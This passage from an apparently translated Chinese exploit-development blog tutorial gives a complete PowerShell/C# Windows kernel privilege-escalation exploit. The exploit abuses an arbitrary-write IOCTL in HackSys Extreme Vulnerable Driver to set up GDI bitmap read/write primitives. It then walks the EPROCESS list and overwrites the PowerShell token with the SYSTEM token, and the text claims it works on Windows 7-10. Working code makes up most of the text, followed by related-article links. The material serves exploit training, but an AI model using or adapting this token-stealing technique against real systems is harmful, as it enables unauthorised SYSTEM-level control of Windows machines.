$PsInitialSystemProcess = [EVD]::GetProcAddress($KernelHanle, "PsInitialSystemProcess")

$SysEprocessPtr = if (!$x32Architecture) {$PsInitialSystemProcess.ToInt64() - $KernelHanle + $KernelBase} else {$PsInitialSystemProcess.ToInt32() - $KernelHanle + $KernelBase}

$CallResult = [EVD]::FreeLibrary($KernelHanle)

echo "[+] _EPORCESS list entry: 0x$("{0:X}" -f $SysEprocessPtr)"

$SysEPROCESS = Bitmap-Read -Address $SysEprocessPtr

echo "[+] SYSTEM _EPORCESS address: 0x$("{0:X}" -f $(Bitmap-Read -Address $SysEprocessPtr))"

echo "[+] PID: $(Bitmap-Read -Address $($SysEPROCESS+$UniqueProcessIdOffset))"

echo "[+] SYSTEM Token: 0x$("{0:X}" -f $(Bitmap-Read -Address $($SysEPROCESS+$TokenOffset)))"

$SysToken = Bitmap-Read -Address $($SysEPROCESS+$TokenOffset)

注意到token减了1,这是因为token成员是一个_EX_FAST_REF结构,它的最后一位用于引用计数,尽管我们无需担忧这一行为。一个完整的提权过程要先找到PowerShell的EPROCESS结构体,然后用泄露出来的SYSTEM的token来覆盖它。这就是ActiveProcessLinks成员的作用了。EPROCESS结构组成了一个链表,它通过ActiveProcessLinks成员来链入,该成员内部包含了一个_LIST_ENTRY([IntPtr]Flink, [IntPtr]Blink)成员,存储了前后两个EPROCESS结构体的地址。我们所需要做的就是遍历该链表,直到我们找到PowerShell进程对应的EPROCESS结构,此后进行token覆盖。下面的代码展示了这一技巧。

# Get EPROCESS entry for current process

echo "`n[>] Leaking current _EPROCESS.."

echo "[+] Traversing ActiveProcessLinks list"

$NextProcess = $(Bitmap-Read -Address $($SysEPROCESS+$ActiveProcessLinks)) - $UniqueProcessIdOffset - [System.IntPtr]::Size

while($true) {

$NextPID = Bitmap-Read -Address $($NextProcess+$UniqueProcessIdOffset)

if ($NextPID -eq $PID) {

echo "[+] PowerShell _EPORCESS address: 0x$("{0:X}" -f $NextProcess)"

echo "[+] PID: $NextPID"

echo "[+] PowerShell Token: 0x$("{0:X}" -f $(Bitmap-Read -Address $($NextProcess+$TokenOffset)))"

$PoShTokenAddr = $NextProcess+$TokenOffset

break

}

$NextProcess = $(Bitmap-Read -Address $($NextProcess+$ActiveProcessLinks)) - $UniqueProcessIdOffset - [System.IntPtr]::Size

}

# Duplicate token!

echo "`n[!] Duplicating SYSTEM token!`n"

Bitmap-Write -Address $PoShTokenAddr -Value $SysToken

游戏结束

下面的exploit可以在32位和64位的Windows 7-10上运行。如果遇到了问题,请留下评论。

Add-Type -TypeDefinition @"

using System;

using System.Diagnostics;

using System.Runtime.InteropServices;

using System.Security.Principal;

[StructLayout(LayoutKind.Sequential, Pack = 1)]

public struct SYSTEM_MODULE_INFORMATION

{

[MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)]

public UIntPtr[] Reserved;

public IntPtr ImageBase;

public UInt32 ImageSize;

public UInt32 Flags;

public UInt16 LoadOrderIndex;

public UInt16 InitOrderIndex;

public UInt16 LoadCount;

public UInt16 ModuleNameOffset;

[MarshalAs(UnmanagedType.ByValArray, SizeConst = 256)]

internal Char[] _ImageName;

public String ImageName {

get {

return new String(_ImageName).Split(new Char[] {'\0'}, 2)[0];

}

}

}

[StructLayout(LayoutKind.Sequential)]

public struct _PROCESS_BASIC_INFORMATION

{

public IntPtr ExitStatus;

public IntPtr PebBaseAddress;

public IntPtr AffinityMask;

public IntPtr BasePriority;

public UIntPtr UniqueProcessId;

public IntPtr InheritedFromUniqueProcessId;

}

/// Partial _PEB

[StructLayout(LayoutKind.Explicit, Size = 256)]

public struct _PEB

{

[FieldOffset(148)]

public IntPtr GdiSharedHandleTable32;

[FieldOffset(248)]

public IntPtr GdiSharedHandleTable64;

}

[StructLayout(LayoutKind.Sequential)]

public struct _GDI_CELL

{

public IntPtr pKernelAddress;

public UInt16 wProcessId;

public UInt16 wCount;

public UInt16 wUpper;

public UInt16 wType;

public IntPtr pUserAddress;

}

public static class EVD

{

[DllImport("ntdll.dll")]

public static extern int NtQueryInformationProcess(

IntPtr processHandle,

int processInformationClass,

ref _PROCESS_BASIC_INFORMATION processInformation,

int processInformationLength,

ref int returnLength);

[DllImport("ntdll.dll")]

public static extern int NtQuerySystemInformation(

int SystemInformationClass,

IntPtr SystemInformation,

int SystemInformationLength,

ref int ReturnLength);

[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]

public static extern IntPtr CreateFile(

String lpFileName,

UInt32 dwDesiredAccess,

UInt32 dwShareMode,

IntPtr lpSecurityAttributes,

UInt32 dwCreationDisposition,

UInt32 dwFlagsAndAttributes,

IntPtr hTemplateFile);

[DllImport("Kernel32.dll", SetLastError = true)]

public static extern bool DeviceIoControl(

IntPtr hDevice,

int IoControlCode,

byte[] InBuffer,

int nInBufferSize,

byte[] OutBuffer,

int nOutBufferSize,

ref int pBytesReturned,

IntPtr Overlapped);

[DllImport("kernel32.dll", SetLastError = true)]

public static extern IntPtr VirtualAlloc(

IntPtr lpAddress,

uint dwSize,

UInt32 flAllocationType,

UInt32 flProtect);

[DllImport("kernel32.dll", SetLastError=true)]

public static extern bool VirtualFree(

IntPtr lpAddress,

uint dwSize,

uint dwFreeType);

[DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]

public static extern IntPtr LoadLibrary(

string lpFileName);

[DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)]

public static extern IntPtr GetProcAddress(

IntPtr hModule,

string procName);

[DllImport("kernel32.dll", SetLastError=true)]

public static extern bool FreeLibrary(

IntPtr hModule);

[DllImport("gdi32.dll")]

public static extern IntPtr CreateBitmap(

int nWidth,

int nHeight,

uint cPlanes,

uint cBitsPerPel,

IntPtr lpvBits);

[DllImport("gdi32.dll")]

public static extern int SetBitmapBits(

IntPtr hbmp,

uint cBytes,

byte[] lpBits);

[DllImport("gdi32.dll")]

public static extern int GetBitmapBits(

IntPtr hbmp,

int cbBuffer,

IntPtr lpvBits);

}

"@

#==============================================[PEB]

# Flag architecture $x32Architecture/!$x32Architecture

if ([System.IntPtr]::Size -eq 4) {

echo "`n[>] Target is 32-bit!"

$x32Architecture = 1

} else {

echo "`n[>] Target is 64-bit!"

}

# Current Proc handle

$ProcHandle = (Get-Process -Id ([System.Diagnostics.Process]::GetCurrentProcess().Id)).Handle

# Process Basic Information

$PROCESS_BASIC_INFORMATION = New-Object _PROCESS_BASIC_INFORMATION

$PROCESS_BASIC_INFORMATION_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($PROCESS_BASIC_INFORMATION)

$returnLength = New-Object Int

$CallResult = [EVD]::NtQueryInformationProcess($ProcHandle, 0, [ref]$PROCESS_BASIC_INFORMATION, $PROCESS_BASIC_INFORMATION_Size, [ref]$returnLength)

# PID & PEB address

echo "`n[?] PID $($PROCESS_BASIC_INFORMATION.UniqueProcessId)"

if ($x32Architecture) {

echo "[+] PebBaseAddress: 0x$("{0:X8}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt32())"

} else {

echo "[+] PebBaseAddress: 0x$("{0:X16}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64())"

}

# Lazy PEB parsing

$_PEB = New-Object _PEB

$_PEB = $_PEB.GetType()

$BufferOffset = $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64()

$NewIntPtr = New-Object System.Intptr -ArgumentList $BufferOffset

$PEBFlags = [system.runtime.interopservices.marshal]::PtrToStructure($NewIntPtr, [type]$_PEB)

# GdiSharedHandleTable

if ($x32Architecture) {

echo "[+] GdiSharedHandleTable: 0x$("{0:X8}" -f $PEBFlags.GdiSharedHandleTable32.ToInt32())"

} else {

echo "[+] GdiSharedHandleTable: 0x$("{0:X16}" -f $PEBFlags.GdiSharedHandleTable64.ToInt64())"

}

# _GDI_CELL size

$_GDI_CELL = New-Object _GDI_CELL

$_GDI_CELL_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($_GDI_CELL)

#==============================================[/PEB]

#==============================================[Bitmap]

echo "`n[>] Creating Bitmaps.."

# Manager Bitmap

[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)

$ManagerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)

echo "[+] Manager BitMap handle: 0x$("{0:X}" -f [int]$ManagerBitmap)"

if ($x32Architecture) {

$HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size)

echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)"

$ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)

echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))"

$ManagerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30

echo "[+] Manager pvScan0 pointer: 0x$("{0:X8}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30))"

} else {

$HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size)

echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)"

$ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)

echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))"

$ManagerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50

echo "[+] Manager pvScan0 pointer: 0x$("{0:X16}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50))"

}

# Worker Bitmap

[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)

$WorkerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)

echo "[+] Worker BitMap handle: 0x$("{0:X}" -f [int]$WorkerBitmap)"

if ($x32Architecture) {

$HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size)

echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)"

$WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)

echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))"

$WorkerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30

echo "[+] Worker pvScan0 pointer: 0x$("{0:X8}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30))"

} else {

$HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size)

echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)"

$WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)

echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))"

$WorkerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50

echo "[+] Worker pvScan0 pointer: 0x$("{0:X16}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50))"

}

#==============================================[/Bitmap]

#==============================================[GDI ring0 primitive]

$hDevice = [EVD]::CreateFile("\\.\HacksysExtremeVulnerableDriver", [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::ReadWrite, [System.IntPtr]::Zero, 0x3, 0x40000080, [System.IntPtr]::Zero)

if ($hDevice -eq -1) {

echo "`n[!] Unable to get driver handle..`n"

Return

} else {

echo "`n[>] Driver information.."

echo "[+] lpFileName: \\.\HacksysExtremeVulnerableDriver"

echo "[+] Handle: $hDevice"

}

# [IntPtr]$WriteWhatPtr->$WriteWhat + $WriteWhere

#---

[IntPtr]$WriteWhatPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.BitConverter]::GetBytes($WorkerpvScan0).Length)

[System.Runtime.InteropServices.Marshal]::Copy([System.BitConverter]::GetBytes($WorkerpvScan0), 0, $WriteWhatPtr, [System.BitConverter]::GetBytes($WorkerpvScan0).Length)

if ($x32Architecture) {

[byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt32()) + [System.BitConverter]::GetBytes($ManagerpvScan0)

} else {

[byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt64()) + [System.BitConverter]::GetBytes($ManagerpvScan0)

}

echo "`n[>] Sending buffer.."

echo "[+] Buffer length: $($Buffer.Length)"

echo "[+] IOCTL: 0x22200B"

[EVD]::DeviceIoControl($hDevice, 0x22200B, $Buffer, $Buffer.Length, $null, 0, [ref]0, [System.IntPtr]::Zero) |Out-null

#==============================================[/GDI ring0 primitive]

#==============================================[Leak loaded module base addresses]

[int]$BuffPtr_Size = 0

while ($true) {

[IntPtr]$BuffPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($BuffPtr_Size)

$SystemInformationLength = New-Object Int

# SystemModuleInformation Class = 11

$CallResult = [EVD]::NtQuerySystemInformation(11, $BuffPtr, $BuffPtr_Size, [ref]$SystemInformationLength)

# STATUS_INFO_LENGTH_MISMATCH

if ($CallResult -eq 0xC0000004) {

[System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr)

[int]$BuffPtr_Size = [System.Math]::Max($BuffPtr_Size,$SystemInformationLength)

}

# STATUS_SUCCESS

elseif ($CallResult -eq 0x00000000) {

break

}

# Probably: 0xC0000005 -> STATUS_ACCESS_VIOLATION

else {

[System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr)

echo "[!] Error, NTSTATUS Value: $('{0:X}' -f ($CallResult))`n"

return

}

}

$SYSTEM_MODULE_INFORMATION = New-Object SYSTEM_MODULE_INFORMATION

$SYSTEM_MODULE_INFORMATION = $SYSTEM_MODULE_INFORMATION.GetType()

if ([System.IntPtr]::Size -eq 4) {

$SYSTEM_MODULE_INFORMATION_Size = 284

} else {

$SYSTEM_MODULE_INFORMATION_Size = 296

}

$BuffOffset = $BuffPtr.ToInt64()

$HandleCount = [System.Runtime.InteropServices.Marshal]::ReadInt32($BuffOffset)

$BuffOffset = $BuffOffset + [System.IntPtr]::Size

$SystemModuleArray = @()

for ($i=0; $i -lt $HandleCount; $i++){

$SystemPointer = New-Object System.Intptr -ArgumentList $BuffOffset

$Cast = [system.runtime.interopservices.marshal]::PtrToStructure($SystemPointer,[type]$SYSTEM_MODULE_INFORMATION)

$HashTable = @{

ImageName = $Cast.ImageName

ImageBase = if ([System.IntPtr]::Size -eq 4) {$($Cast.ImageBase).ToInt32()} else {$($Cast.ImageBase).ToInt64()}

ImageSize = "0x$('{0:X}' -f $Cast.ImageSize)"

}

$Object = New-Object PSObject -Property $HashTable

$SystemModuleArray += $Object

$BuffOffset = $BuffOffset + $SYSTEM_MODULE_INFORMATION_Size

}

# Free SystemModuleInformation array

[System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr)

#==============================================[/Leak loaded module base addresses]

#==============================================[Duplicate SYSTEM token]

# _EPROCESS UniqueProcessId/Token/ActiveProcessLinks offsets based on OS

# WARNING offsets are invalid for Pre-RTM images!

$OSVersion = [Version](Get-WmiObject Win32_OperatingSystem).Version

$OSMajorMinor = "$($OSVersion.Major).$($OSVersion.Minor)"

switch ($OSMajorMinor)

{

'10.0' # Win10 / 2k16

{

if(!$x32Architecture){

$UniqueProcessIdOffset = 0x2e8

$TokenOffset = 0x358

$ActiveProcessLinks = 0x2f0

} else {

$UniqueProcessIdOffset = 0xb4

$TokenOffset = 0xf4

$ActiveProcessLinks = 0xb8

}

}

'6.3' # Win8.1 / 2k12R2

{

if(!$x32Architecture){

$UniqueProcessIdOffset = 0x2e0

$TokenOffset = 0x348

$ActiveProcessLinks = 0x2e8

} else {

$UniqueProcessIdOffset = 0xb4

$TokenOffset = 0xec

$ActiveProcessLinks = 0xb8

}

}

'6.2' # Win8 / 2k12

{

if(!$x32Architecture){

$UniqueProcessIdOffset = 0x2e0

$TokenOffset = 0x348

$ActiveProcessLinks = 0x2e8

} else {

$UniqueProcessIdOffset = 0xb4

$TokenOffset = 0xec

$ActiveProcessLinks = 0xb8

}

}

'6.1' # Win7 / 2k8R2

{

if(!$x32Architecture){

$UniqueProcessIdOffset = 0x180

$TokenOffset = 0x208

$ActiveProcessLinks = 0x188

} else {

$UniqueProcessIdOffset = 0xb4

$TokenOffset = 0xf8

$ActiveProcessLinks = 0xb8

}

}

}

# Arbitrary Kernel read

function Bitmap-Read {

param ($Address)

$CallResult = [EVD]::SetBitmapBits($ManagerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Address))

[IntPtr]$Pointer = [EVD]::VirtualAlloc([System.IntPtr]::Zero, [System.IntPtr]::Size, 0x3000, 0x40)

$CallResult = [EVD]::GetBitmapBits($WorkerBitmap, [System.IntPtr]::Size, $Pointer)

if ($x32Architecture){

[System.Runtime.InteropServices.Marshal]::ReadInt32($Pointer)

} else {

[System.Runtime.InteropServices.Marshal]::ReadInt64($Pointer)

}

$CallResult = [EVD]::VirtualFree($Pointer, [System.IntPtr]::Size, 0x8000)

}

# Arbitrary Kernel write

function Bitmap-Write {

param ($Address, $Value)

$CallResult = [EVD]::SetBitmapBits($ManagerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Address))

$CallResult = [EVD]::SetBitmapBits($WorkerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Value))

}

# Get EPROCESS entry for System process

echo "`n[>] Leaking SYSTEM _EPROCESS.."

$KernelBase = $SystemModuleArray[0].ImageBase

$KernelType = ($SystemModuleArray[0].ImageName -split "\\")[-1]

$KernelHanle = [EVD]::LoadLibrary("$KernelType")

$PsInitialSystemProcess = [EVD]::GetProcAddress($KernelHanle, "PsInitialSystemProcess")

$SysEprocessPtr = if (!$x32Architecture) {$PsInitialSystemProcess.ToInt64() - $KernelHanle + $KernelBase} else {$PsInitialSystemProcess.ToInt32() - $KernelHanle + $KernelBase}

$CallResult = [EVD]::FreeLibrary($KernelHanle)

echo "[+] _EPORCESS list entry: 0x$("{0:X}" -f $SysEprocessPtr)"

$SysEPROCESS = Bitmap-Read -Address $SysEprocessPtr

echo "[+] SYSTEM _EPORCESS address: 0x$("{0:X}" -f $(Bitmap-Read -Address $SysEprocessPtr))"

echo "[+] PID: $(Bitmap-Read -Address $($SysEPROCESS+$UniqueProcessIdOffset))"

echo "[+] SYSTEM Token: 0x$("{0:X}" -f $(Bitmap-Read -Address $($SysEPROCESS+$TokenOffset)))"

$SysToken = Bitmap-Read -Address $($SysEPROCESS+$TokenOffset)

# Get EPROCESS entry for current process

echo "`n[>] Leaking current _EPROCESS.."

echo "[+] Traversing ActiveProcessLinks list"

$NextProcess = $(Bitmap-Read -Address $($SysEPROCESS+$ActiveProcessLinks)) - $UniqueProcessIdOffset - [System.IntPtr]::Size

while($true) {

$NextPID = Bitmap-Read -Address $($NextProcess+$UniqueProcessIdOffset)

if ($NextPID -eq $PID) {

echo "[+] PowerShell _EPORCESS address: 0x$("{0:X}" -f $NextProcess)"

echo "[+] PID: $NextPID"

echo "[+] PowerShell Token: 0x$("{0:X}" -f $(Bitmap-Read -Address $($NextProcess+$TokenOffset)))"

$PoShTokenAddr = $NextProcess+$TokenOffset

break

}

$NextProcess = $(Bitmap-Read -Address $($NextProcess+$ActiveProcessLinks)) - $UniqueProcessIdOffset - [System.IntPtr]::Size

}

# Duplicate token!

echo "`n[!] Duplicating SYSTEM token!`n"

Bitmap-Write -Address $PoShTokenAddr -Value $SysToken

#==============================================[/Duplicate SYSTEM token]

最后于 2018-3-15 20:23

被玉涵编辑

,原因:

瞻子苏苏苏
关注
FuzzySecurity Windows Exploit 开发系列教程 1~19
05-20
FuzzySecurity Windows Exploit 开发系列教程 1~19 FuzzySecurity Windows Exploit 开发系列教程 1~19
PWN总结
醉等佳人归
08-19 2658
文章目录1.ROP绕过2.radare2基本指令 1.ROP绕过 2.radare2基本指令 常用命令: 信息搜集: $ rabin2 -I ./program — 查看二进制信息 ii [q] – 查看导出表 ?v sym.imp.func_name — 获取过程链接表中相应函数的地址(func_name@PLT) ?v reloc.func_name —获取全局偏移表中函数的地址(func_name@GOT) ie [q] — 获取入口点地址 内存相关: dmm — 列出模块 (库文件,内存中加载的二进
C# [DllImport(“kernel32.dll“)]
weixin_39354845的博客
10-11 1562
DllImport的使用
windbg分析dmp蓝屏文件_手把手教你分析漏洞 : CVE-2018-8120
weixin_39998462的博客
11-23 436
实验环境双虚拟机调试这里我把漏洞机和调试机都放在了虚拟机里,采用虚拟机调试虚拟机的好处就是可以实时保存快照,有空的时候在接着工作(其实是为了更好的加班,开个玩笑~~1.漏洞机的设置在虚拟机里安装后系统后,必须进行断网设置 ,因为我在测试调试的时候,运行poc几次后都是成功的,而后就不行了,排除了原因很久,IDA发现,它自动打了补丁(以前内核调试的时候,都没有遇到这种问题)。断网设置如下:右键漏洞机...
如何洞察 C# 程序GDI 句柄泄露
最新发布
dotNET跨平台
06-13 243
一:背景 1. 讲故事前段时间有位朋友找到我,说他的程序界面操作起来很慢并且卡顿等一些不正常现象,从任务管理器看了下 GDI句柄 已经到 1w 了,一时也找不出什么代码中哪里有问题,让我帮忙看下,其实这种问题看内存dump作用不是很大,主要是写脚本很麻烦,这一篇我们就来简单聊聊如何洞察此类问题。二:如何洞察泄露 1. 一个测试小案例在 windowsgdi的句柄类型有很多,比如:pen,fon...
byeintegrity-uac-master_exp_UAC_advanced_vc++_win7/win8_
09-30
uac-master_exp_UAC_advanced_vc++_win7/win8_”似乎是一个项目或软件的名称,暗示我们正在处理一个与Windows操作系统用户账户控制(User Account Control, UAC)相关的高级安全研究或者开发项目。这个项目可能使用...
Exploit_编写系列教程.pdf
08-08
根据提供的文档内容,以下是对“Exploit 编写系列教程.pdf”的知识点详细说明: ### 1. Exploit 编写教程的范围和结构 本教程系列是一套完整的教育资料,专门针对Windows平台上的栈溢出编写技术。教程从基础的栈...
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
《深入解析Fastjson-RCE漏洞及其利用》 Fastjson,作为一个高效、强大的Java语言中用于处理JSON数据的库,被广泛应用于各种系统和项目中。然而,任何软件都可能存在潜在的安全隐患,Fastjson也不例外。"fastjson-...
XSS利用与挖掘-_更新版.rar_Exploit_XSS_XSS 利用_pkav_web exploit
09-23
**XSS(跨站脚本攻击)是一种常见的网络安全漏洞,主要出现在Web应用程序中。这种攻击方式允许攻击者通过注入恶意脚本到网页上,当用户访问这些被篡改的页面时,恶意脚本将在用户的浏览器中执行,可能导致敏感信息...
内核入口地址在哪修改_Windows 10 内核漏洞利用防护及其绕过方法
weixin_39771301的博客
11-22 544
0x00 引⾔本⽂介绍了 Windows 10 1607 和 1703 版本中引⼊的针对内核漏洞利⽤的防护措施,在此基础上将给出相应的绕过⽅案,从⽽使我们能够重新获得内核态下的 RW primitives,并进⼀步实现 KASLR 绕过以及内核中 shellcode 的执⾏。尽管微软对于 Windows 10 内核的保护在不断提升,我们还是有可能找到办法来进⾏绕过,不过这对安全研究者的技术要求来说...
64位bitmap操作
lotus302的专栏
01-26 1675
#include #define set_bit1(x,y) (x|=(0x01L<<y)) #define set_bit0(x,y) (x&=(~(0x01L<<y))) #define get_bit(x,y) (x&(0x01L<<y)) int main() { int pos = 31; unsigned long bitmap = 0xffffff
Exploit编写教程1:栈溢出
周无争的博客
05-26 2235
Exploit编写教程1:栈溢出 要点提示: 复现环境首选 WinXP,因为没有 地址随机化ASLR,可以减少复现难度。ASLR在 Vista以上版本才有。 用到的工具有:python3\pwntools\windbg\x32dbg\msfvenom 造成崩溃后查看EIP是否为目标地址,使用 d esp 查看栈中的数据。 直接使EIP指向ESP不会有效果,要使EIP指向 jmp esp 指令的地址。 查看软件加载的DLL所在的地址范围,再使用 s 1a800000 l 1f200000 ff e4 查询该
BitmapWin7内核漏洞中的利用
qq_41252520的博客
03-17 4211
Windows7下利用Bitmap借助内核漏洞获取内核读写原语
QT+OPENCV实现录屏功能
weixin_30602505的博客
07-18 836
本文使用QT+opencv来实现对指定窗体画面录制,并保存为avi文件。 (1)获取窗体界面 QScreen类有一个grabWindow函数,可以用来获取窗体的画面,这个函数使用很简单,就是传入窗体句柄和要截取的坐标。但是这个函数有一个缺陷,它是通过截取桌面画面的方式,而不是通过 窗体获取界面,所以当你的窗体被其他窗体遮挡时,就无法截取完整的窗体界面,如果你是要录制整个桌面画面,那...
C#内存泄漏 非托管堆内存泄漏
ljg888的专栏
04-28 7959
<br />刚进实验室,老师给我一项任务:一个已经开发好的软件,有两个BUG,要我去改。软件是用C#写的,这个以前没搞过C#。所以就一边看书学习一边看代码。<br />第一个BUG其实严格来说不叫BUG,而是功能的完善:目前软件的日志只能在本软件中保存和打开查看,我需要把日志以Word文档形式导出来。这个功能的实现我用了大概一周就基本完成了。后来就把精力全放在第二个BUG上了。第二个BUG是:本软件要调用外部COM组件,但是在执行某些COM组件时,程序运行到一半就自行退出,崩溃了。听说以前有多个同学搞过这个
一些基本的GDI操作BITMAP的方法
weixin_30915275的博客
01-10 479
转自:http://www.cppblog.com/richardzeng/archive/2006/03/10/3962.html 1 2 #ifndef _BITMAP_H 3 #define _BITMAP_H 4 5 #include <windows.h> 6 7 void SaveImage(const char * bmp_file,...
win 10 dpi:150% 与 win 7 dpi:150% 的不同之处
weixin_30887919的博客
03-29 584
由于 win 7 和 win 10 的 dpi 处理方式不同,导致我们写的客户端程序在 win 7 上运行正常,在 win 10(dpi:150%)上运行不正常了。 具体的描述,可参考:解决win10系统中截图异常放大的问题 (https://blog.csdn.net/chenlycly/article/details/53139564) win 10 通过 DWM 虚拟化支持的 高D...
通过PEB获取模块基址
SUNE__学无止境
05-29 4143
PEB结构typedef struct _PEB { // Size: 0x1D8 /*000*/ UCHAR InheritedAddressSpace; /*001*/ UCHAR ReadImageFileExecOptions; /*002*/ UCHAR BeingDebugged; /*003*/ UCHAR SpareBool; // Allocation size /*004*/ H
Metasploit Exploit 编写教程利用C语言漏洞案例
该资源是一份关于Exploit编写的教程,专注于如何编写Metasploit框架下的exploit教程作者是Peter Van Eeckhoutte,由riusksk翻译教程介绍了exploit的基本概念,强调了编程语言的多样性在exploit编写中的应用,并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值